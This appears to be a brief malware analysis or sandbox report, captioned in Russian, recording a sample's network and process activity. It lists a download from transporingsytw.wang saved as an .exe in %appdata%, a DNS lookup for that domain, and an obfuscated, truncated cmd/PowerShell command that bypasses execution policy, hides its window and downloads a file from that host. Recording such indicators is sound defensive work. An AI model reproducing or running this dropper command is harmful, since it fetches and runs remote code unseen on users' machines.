Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwE^rsH^E^Ll^.^eXE -e^XEcu^T^IO^n^Polic^y^ b^yp^As^S^ -^N^o^ProfIlE^ ^-^W^in^d^OWS^t^YLe^ hiDdeN (neW-o^Bj^E^cT ^sYsteM^.nEt.WeBclIE^nT)^.^D^Ownl^OaDFiLE^(^'http://transporingsy...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "p^OwE^rsH^E^Ll^.^eXE -e^XEcu^T^IO^n^Polic^y^ b^yp^As^S^ -^N^o^ProfIlE^ ^-^W^in^d^OWS^t^YLe^ hiDdeN (neW-o^Bj^E^cT ^sYsteM^.nEt.WeBclIE^nT)^.^D^Ownl^OaDFiLE^(^'http://transporingsy...' (со скрытым окном)